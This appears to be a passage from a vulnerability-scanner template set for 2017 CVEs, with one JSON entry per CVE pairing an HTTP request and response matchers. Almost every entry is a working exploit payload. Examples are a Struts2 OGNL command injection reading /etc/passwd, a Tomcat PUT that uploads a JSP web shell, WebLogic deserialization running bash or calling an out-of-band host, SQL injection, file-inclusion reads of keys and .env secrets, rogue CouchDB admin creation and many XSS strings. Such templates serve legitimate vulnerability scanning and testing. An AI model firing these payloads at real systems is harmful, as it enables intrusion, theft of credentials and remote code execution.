Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-18565","info":{"name":"Updater by BestWebSoft < 1.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/updater/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18556","info":{"name":"Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-3133","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\nDNT: 1\n\ncsrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A\n","GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["</textarea><script>alert(document.domain)</script>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"header","name":"csrf","group":2,"regex":["ccsrftoken_([0-9_a-z]+)=\"([A-Z0-9]+)\";"],"internal":true}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: 